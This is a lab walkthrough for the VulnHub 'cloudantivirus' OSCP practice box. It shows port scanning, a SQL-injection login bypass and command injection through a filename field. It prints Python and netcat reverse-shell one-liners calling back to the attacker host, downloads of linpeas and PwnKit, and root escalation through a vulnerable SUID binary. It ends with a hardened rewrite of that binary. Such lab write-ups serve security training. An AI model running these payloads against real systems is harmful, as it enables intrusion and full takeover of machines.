OSCP Practice Box | cloudantivirus

admin, 2024-07-14 09:21:21

Stay disciplined and be your best self: one box a day, and everyone is welcome to keep me honest.


0-Preface

The approach for these box walkthroughs mainly follows OSCP | Textbook Summary.

If you are not familiar with the textbook material, see OSCP | Textbook Notes Collection Download.

For every step in the walkthrough that draws on the textbook, I note the section number, so you can go back to the textbook notes whenever something is unfamiliar.

1-Environment Setup

Target machine download:

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

Kali image:

kali-linux-2024.2-virtualbox-amd64

Virtualization environment:

Oracle VM VirtualBox 7.0

Network:

Both Kali and the target use the "Host-Only network" adapter. Start Kali first, then the target: the previous box was assigned the .102 address, so this one gets .103.

Kali IP: 192.168.56.101

Target IP: 192.168.56.103

2-Box Walkthrough

2-1-Scanning and Enumeration

Port scan; the command is covered in "6.3 Active Information Gathering" of the "OSCP | Information Gathering" chapter.

sudo nmap -p 1-65535 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 21:33 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27:49:74:E2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

Ports 22 and 8080 are open. Next, service enumeration; the command is covered in "6.3 Active Information Gathering" of the "OSCP | Information Gathering" chapter.

sudo nmap -p22,8080 -sT -A 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 21:35 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00041s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6a:42:4b:7c:2a:06:0f:50:4b:32:cf:b8:31:e9:c4:f4 (RSA)
|   256 81:c7:60:0f:d7:1e:56:f7:a3:1e:9f:76:27:bd:31:27 (ECDSA)
|_  256 71:90:c3:26:ba:3b:e8:b3:53:7e:73:53:27:4d:6b:af (ED25519)
8080/tcp open  http       Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:49:74:E2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

Port 22 is SSH, OpenSSH 7.6p1; searching for an exploitable vulnerability turned up nothing.

Port 8080 is HTTP served by Werkzeug, i.e. a Python web application. Opening it in a browser shows a "Cloud Anti-Virus Scanner!" page, but it requires a password to log in.

The usual lines of attack when facing a web application:

1-Path guessing, using gobuster with a wordlist

The command is covered in "8.2.3 Directory Enumeration" of the "OSCP | Introduction to Web Attacks" chapter.

gobuster dir -u http://192.168.56.103:8080 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103:8080
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 200) [Size: 1985]
/login                (Status: 405) [Size: 178]
/output               (Status: 405) [Size: 178]
/scan                 (Status: 200) [Size: 48]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Visiting the four paths one by one, nothing further exploitable was found.

2-Password brute force, using Burp with a wordlist

Capture the login request with Burp; the procedure is covered in "8.2 Web Analysis Tools" of the "OSCP | Introduction to Web Attacks" chapter.

POST /login HTTP/1.1
Host: 192.168.56.103:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://192.168.56.103:8080
Connection: close
Referer: http://192.168.56.103:8080/
Cookie: session=eyJsb2dnZWRfaW4iOnRydWV9.ZpCLIQ.mVWTHQcV5rGEfPXHEKjmfhHQC1o
Upgrade-Insecure-Requests: 1


password=test

Brute-force the password parameter with the /usr/share/set/src/fasttrack/wordlist.txt wordlist.

The password turns out to be password.

3-Web vulnerabilities, such as SQL injection and command injection

Trying SQL injection, the login can be bypassed with the following password:

"or""="

Both method 2 and method 3 get you logged in and land on the http://192.168.56.103:8080/scan page.

2-2-Exploitation

It looks like a text box and a button; judging from the page, you enter a filename and the page returns the virus scan result.

Presumably, once a filename is entered, the system calls the antivirus program to scan it and returns the result; the parameter we control is the filename.

Concatenating a filename into a command easily leads to command injection; the procedure is covered in "9.4 Command Execution" of the "OSCP | Common Web Attacks" chapter.

Enter as the filename:

hello | id
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)

The command executes. Generate a payload with https://revshells.com:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Enter as the filename:

hello | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Listen on port 443 on Kali and catch the shell:

nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 60708
$ id
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
$

3-Privilege Escalation

3-1-Privilege Escalation Enumeration

Upload and run linpeas.sh; the commands are covered in "17.1.3 Automated Enumeration" of the "OSCP | Linux Privilege Escalation" chapter.

cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

It reports:

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

3-2-Privilege Escalation Exploitation

Here I used [CVE-2021-4034] PwnKit (https://github.com/ly4k/PwnKit).

wget http://192.168.56.101/PwnKit
chmod +x ./PwnKit
./PwnKit
id
uid=0(root) gid=0(root) groups=0(root)

There is a second privilege escalation route as well; in the linpeas.sh output:

══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-- 1 root messagebus 42K Nov 15  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 99K Jul 19  2018 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Feb 10  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14K Jul 13  2018 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 79K Aug  1  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 22K Jul 13  2018 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 19K Mar  9  2017 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 59K Jan 25  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 37K Jan 25  2018 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37K Jan 25  2018 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 44K Jan 25  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 75K Jan 25  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Jan 25  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 75K Jan 25  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 146K Jan 18  2018 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root scanner 8.4K Oct 24  2018 /home/scanner/update_cloudav (Unknown SUID binary!)

/home/scanner/update_cloudav has the SUID bit set and is not a stock system program, so go into that directory and look at the files.

ls -l
total 20
drwxrwxr-x 4 scanner scanner 4096 Oct 24  2018 cloudav_app
-rwsr-xr-x 1 root    scanner 8576 Oct 24  2018 update_cloudav
-rw-rw-r-- 1 scanner scanner  393 Oct 24  2018 update_cloudav.c
$ cat update_cloudav.c

#include <stdio.h>
#include <stdlib.h>   /* malloc */
#include <string.h>   /* strlen */
#include <unistd.h>   /* setgid, setuid */

int main(int argc, char *argv[])
{
    char *freshclam = "/usr/bin/freshclam";

    if (argc < 2) {
        printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
        return 1;
    }

    /* the user-controlled argv[1] is concatenated straight into a shell command string */
    char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
    sprintf(command, "%s %s", freshclam, argv[1]);
    setgid(0);
    setuid(0);
    system(command);   /* runs via /bin/sh, so shell metacharacters in argv[1] are interpreted as root */
    return 0;
}

update_cloudav calls /usr/bin/freshclam with one appended argument; because the argument is concatenated into a string that goes to system(), command injection is the obvious guess.

./update_cloudav "test | id"
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
$

Commands really do run as root. Generate a payload with https://revshells.com; if one does not work, try a few others.

./update_cloudav "test | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.101 1337 >/tmp/f"

Listen on port 1337 on Kali and catch the root shell:

nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 37142
# id
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
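Both footholds on this box have the same root cause: the web scanner concatenates a filename into a shell command, and update_cloudav.c does the same with sprintf() and system(). The hardened rewrite of update_cloudav below is an added example, not code from the box or the original post: it checks the argument against an allowlist and execs freshclam directly with no shell, so "test | id" is rejected instead of executed. The 64-character limit and the allowed character set (which deliberately excludes "/") are my own choices.

```c
/* Hardened rewrite of update_cloudav.c (added example, not the box's own code).
 * The original ran "/usr/bin/freshclam <argv[1]>" through system(), so a shell
 * parsed the user-controlled argument. Here the argument is validated and handed
 * to execv() as its own argv entry, so no shell is ever involved. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* 1 if arg is non-empty, short and built only from allowlisted characters.
 * '|', ';', '$', '`', quotes, whitespace and '/' are all rejected, so the caller
 * can neither reach a shell nor point freshclam at files it controls. */
int arg_is_safe(const char *arg)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_=.";
    size_t len = strlen(arg);
    return len > 0 && len <= 64 && strspn(arg, allowed) == len;
}

/* Run freshclam with one validated argument and no shell. Returns the child's
 * exit status, or -1 if the argument is rejected or the process cannot run. */
int run_freshclam(const char *arg)
{
    const char *freshclam = "/usr/bin/freshclam";
    char *const child_argv[] = { (char *)freshclam, (char *)arg, NULL };
    pid_t pid; int status;
    if (!arg_is_safe(arg) || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        /* raise privileges only in the child and only after validation */
        if (setgid(0) != 0 || setuid(0) != 0)
            _exit(127);
        execv(freshclam, child_argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("This tool lets you update antivirus rules\n"
               "Please supply command line arguments for freshclam\n");
        return 1;
    }
    return run_freshclam(argv[1]) == 0 ? 0 : 1;
}
```

Even without the shell, letting an unprivileged user pass arbitrary options to a root-run freshclam is risky, which is why the allowlist also blocks path-like values rather than only shell metacharacters.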

Done, box finished.

There is more than one way in; give the others a try.

If you know a good box, leave a message recommending it.

Or if you have box write-ups of your own, send them to me and I will share them.


Stay disciplined and be your best self.

Originally published on the WeChat official account 高级红队专家: OSCP Practice Box | cloudantivirus

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. For any issues, contact us by e-mail (use a corporate or otherwise valid mailbox to avoid filtering; contact details are on the home page).
Repost source (CN-SEC): OSCP Practice Box | cloudantivirus, https://cn-sec.com/archives/2952545.html